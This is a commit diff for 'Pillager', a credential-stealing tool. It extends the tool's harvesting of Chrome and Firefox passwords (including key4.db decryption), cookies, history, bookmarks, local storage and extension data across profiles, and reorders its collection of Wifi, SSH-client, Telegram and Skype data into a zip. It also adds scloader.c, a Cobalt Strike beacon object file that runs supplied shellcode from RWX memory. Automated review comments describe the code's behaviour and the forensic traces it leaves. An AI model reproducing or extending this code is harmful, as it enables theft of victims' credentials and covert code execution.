Compare commits


3 Commits

Author SHA1 Message Date
簞純 a0b85725aa Update FireFox.cs 2023-11-07 21:21:12 +08:00
簞純 8bf0b439d2 fix bugs 2023-11-07 20:36:10 +08:00
簞純 78d97d14da Create scloader.c 2023-11-07 19:18:46 +08:00
4 changed files with 181 additions and 165 deletions


@ -222,7 +222,7 @@ namespace Pillager.Browsers
public static void Save(string path)
{
foreach (var browser in Chrome.browserOnChromium)
foreach (var browser in browserOnChromium)
{
try
{
@ -230,7 +230,7 @@ namespace Pillager.Browsers
BrowserName = browser.Key;
BrowserPath = chromepath;
MasterKey = GetMasterKey();
if (MasterKey == null) return;
if (MasterKey == null) continue;
string savepath = Path.Combine(path, BrowserName);
Directory.CreateDirectory(savepath);
string cookies = Chrome_cookies();
@ -241,9 +241,14 @@ namespace Pillager.Browsers
if (!String.IsNullOrEmpty(passwords)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords);
if (!String.IsNullOrEmpty(books)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books);
if (!String.IsNullOrEmpty(history)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history);
if (Directory.Exists(Path.Combine(BrowserPath, "Local Storage"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Local Storage"), Path.Combine(savepath, "Local Storage"), true);
if (Directory.Exists(Path.Combine(BrowserPath, "Local Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Local Extension Settings"), Path.Combine(savepath, "Local Extension Settings"), true);
if (Directory.Exists(Path.Combine(BrowserPath, "Sync Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Sync Extension Settings"), Path.Combine(savepath, "Sync Extension Settings"), true);
foreach (var profile in profiles)
{
Directory.CreateDirectory(Path.Combine(BrowserPath, profile));
if (Directory.Exists(Path.Combine(BrowserPath, profile+"\\Local Storage"))) Methods.CopyDirectory(Path.Combine(BrowserPath, profile + "\\Local Storage"), Path.Combine(savepath, profile + "\\Local Storage"), true);
if (Directory.Exists(Path.Combine(BrowserPath, profile+"\\Local Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, profile + "\\Local Extension Settings"), Path.Combine(savepath, profile + "\\Local Extension Settings"), true);
if (Directory.Exists(Path.Combine(BrowserPath, profile + "\\Sync Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, profile + "\\Sync Extension Settings"), Path.Combine(savepath, profile + "\\Sync Extension Settings"), true);
if (Directory.GetDirectories(Path.Combine(BrowserPath, profile)).Length == 0) Directory.Delete(Path.Combine(BrowserPath, profile));
}
}
catch { }
}
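Review bot: The new per-profile loop writes into the browser's own data tree. `Directory.CreateDirectory(Path.Combine(BrowserPath, profile))` creates the profile directory under `BrowserPath`, and the loop's last line deletes it again when it has no subdirectories, while all three copies target `savepath`. Nothing in the hunk says whether touching the source tree is intended, so the loop should carry a comment such as `// creates, and removes when empty, <profile> under BrowserPath (the browser data directory), not under savepath`. For anyone examining a host afterwards, profile-named directories created and then removed under a Chromium user-data folder are a trace of this routine. `Save` continues past the end of the hunk.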


@ -19,17 +19,11 @@ namespace Pillager.Browsers
public static string FireFox_cookies()
{
StringBuilder cookies = new StringBuilder();
string firefox_cookie_path = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp = Path.Combine(directory, "cookies.sqlite");
if (File.Exists(tmp))
string firefox_cookie_path = Path.Combine(directory, "cookies.sqlite");
if (File.Exists(firefox_cookie_path))
{
firefox_cookie_path = tmp;
break;
}
}
if (!File.Exists(firefox_cookie_path)) return null;
try
{
string cookie_tempFile = Path.GetTempFileName();
@ -47,6 +41,8 @@ namespace Pillager.Browsers
File.Delete(cookie_tempFile);
}
catch { }
}
}
return cookies.ToString();
}
@ -54,17 +50,11 @@ namespace Pillager.Browsers
public static string FireFox_history()
{
StringBuilder history = new StringBuilder();
string firefox_history_path = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp = Path.Combine(directory, "places.sqlite");
if (File.Exists(tmp))
string firefox_history_path = Path.Combine(directory, "places.sqlite");
if (File.Exists(firefox_history_path))
{
firefox_history_path = tmp;
break;
}
}
if (!File.Exists(firefox_history_path)) return null;
try
{
string history_tempFile = Path.GetTempFileName();
@ -79,23 +69,20 @@ namespace Pillager.Browsers
File.Delete(history_tempFile);
}
catch { }
}
}
return history.ToString();
}
public static string FireFox_books()
{
StringBuilder books = new StringBuilder();
string firefox_books_path = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp = Path.Combine(directory, "places.sqlite");
if (File.Exists(tmp))
string firefox_books_path = Path.Combine(directory, "places.sqlite");
if (File.Exists(firefox_books_path))
{
firefox_books_path = tmp;
break;
}
}
if (!File.Exists(firefox_books_path)) return null;
try
{
string books_tempFile = Path.GetTempFileName();
@ -106,7 +93,7 @@ namespace Pillager.Browsers
for (int i = 0; i < handler.GetRowCount(); i++)
{
var fk = handler.GetValue(i, "fk");
if (fk!="0")
if (fk != "0")
{
fks.Add(fk);
}
@ -124,26 +111,21 @@ namespace Pillager.Browsers
File.Delete(books_tempFile);
}
catch { }
}
}
return books.ToString();
}
public static string FireFox_passwords()
{
StringBuilder password = new StringBuilder();
string loginsJsonPath = "";
string keyDBPath = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp1 = Path.Combine(directory, "logins.json");
string tmp2 = Path.Combine(directory, "key4.db");
if (File.Exists(tmp1) && File.Exists(tmp2))
string loginsJsonPath = Path.Combine(directory, "logins.json");
string keyDBPath = Path.Combine(directory, "key4.db");
if (File.Exists(loginsJsonPath) && File.Exists(keyDBPath))
{
loginsJsonPath = tmp1;
keyDBPath = tmp2;
break;
}
}
if (!File.Exists(loginsJsonPath)|| !File.Exists(keyDBPath)) return null;
try
{
string password_keyDB_tempFile = Path.GetTempFileName();
@ -155,7 +137,7 @@ namespace Pillager.Browsers
Asn1Der asn = new Asn1Der();
for (int i = 0; i < handler.GetRowCount(); i++)
{
if (handler.GetValue(i, "id")!="password") continue;
if (handler.GetValue(i, "id") != "password") continue;
byte[] item2Byte;
var globalSalt = Convert.FromBase64String(handler.GetValue(i, "item1"));
try
@ -212,6 +194,9 @@ namespace Pillager.Browsers
File.Delete(password_loginsJson_tempFile);
}
catch { }
}
}
return password.ToString();
}
@ -308,8 +293,8 @@ namespace Pillager.Browsers
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite")))
{
File.Copy(Path.Combine(directory, "storage-sync-v2.sqlite"), Path.Combine(savepath, "storage-sync-v2.sqlite"));
if (File.Exists(Path.Combine(directory, "storage-sync-v2..sqlite-shm")))
File.Copy(Path.Combine(directory, "storage-sync-v2..sqlite-shm"), Path.Combine(savepath, "storage-sync-v2..sqlite-shm"));
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite-shm")))
File.Copy(Path.Combine(directory, "storage-sync-v2.sqlite-shm"), Path.Combine(savepath, "storage-sync-v2.sqlite-shm"));
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite-wal")))
File.Copy(Path.Combine(directory, "storage-sync-v2.sqlite-wal"), Path.Combine(savepath, "storage-sync-v2.sqlite-wal"));
break;
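Review bot: In `FireFox_cookies`, `FireFox_history`, `FireFox_books` and `FireFox_passwords` the `File.Delete(..._tempFile)` call sits inside the `try` and is followed by an empty `catch { }`, so an exception raised between `Path.GetTempFileName()` and the delete leaves the temporary file behind and reports nothing. The loop now runs once per directory under `BrowserPath` instead of stopping at the first match, so this can happen once per profile. The lines between creation and deletion are outside the hunks, so what the temporary file holds is inferred from its name (presumably a copy of the profile database). Each `try` should carry a comment stating the behaviour, e.g. `// temp copy is removed only on success; a failure leaves it in the temp directory`. Leftover `GetTempFileName` files that turn out to be SQLite databases or a logins.json copy are something a responder can look for.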


@ -19,6 +19,15 @@ namespace Pillager
if (File.Exists(savezippath)) File.Delete(savezippath);
Directory.CreateDirectory(savepath);
//Browsers
IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
Chrome.Save(savepath);
FireFox.Save(savepath);
//Others
Wifi.Save(savepath);
//Tools
MobaXterm.Save(savepath);
Xmanager.Save(savepath);
@ -28,15 +37,6 @@ namespace Pillager
Telegram.Save(savepath);
Skype.Save(savepath);
//Browsers
IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
FireFox.Save(savepath);
Chrome.Save(savepath);
//Others
Wifi.Save(savepath);
//ZIP
ZipFile.CreateFromDirectory(savepath, savezippath);
Directory.Delete(savepath, true);


@ -0,0 +1,26 @@
#include <windows.h>
#include "beacon.h"
DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess (VOID);
VOID go(
IN PCHAR Buffer,
IN ULONG Length
)
{
datap parser;
LPBYTE lpShellcodeBuffer = NULL;
DWORD dwShellcodeBufferSize = 0;
LPVOID pMem;
SIZE_T bytesWritten = 0;
DWORD dwThreadId = 0;
BeaconDataParse(&parser, Buffer, Length);
lpShellcodeBuffer = (LPBYTE) BeaconDataExtract(&parser, (int*)(&dwShellcodeBufferSize));
pMem = KERNEL32$VirtualAlloc(0, dwShellcodeBufferSize,MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
KERNEL32$WriteProcessMemory(KERNEL32$GetCurrentProcess(), pMem, lpShellcodeBuffer, dwShellcodeBufferSize, &bytesWritten);
KERNEL32$CreateThread(0, 0, pMem, 0, 0, &dwThreadId);
}
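Review bot: `go` has no comment stating that it runs the caller-supplied buffer as code in the current process. It allocates `PAGE_EXECUTE_READWRITE` memory of the extracted length, copies the buffer in with `WriteProcessMemory` and starts a thread at that address, and none of the three return values is checked. A header comment such as `/* Runs the packed argument buffer as code in the current process (RWX VirtualAlloc -> WriteProcessMemory -> CreateThread); results are not checked. */` would state this for a reader. A private RWX allocation that becomes a thread start address is the sequence memory-protection telemetry is built to flag, so the comment also tells an analyst what to look for.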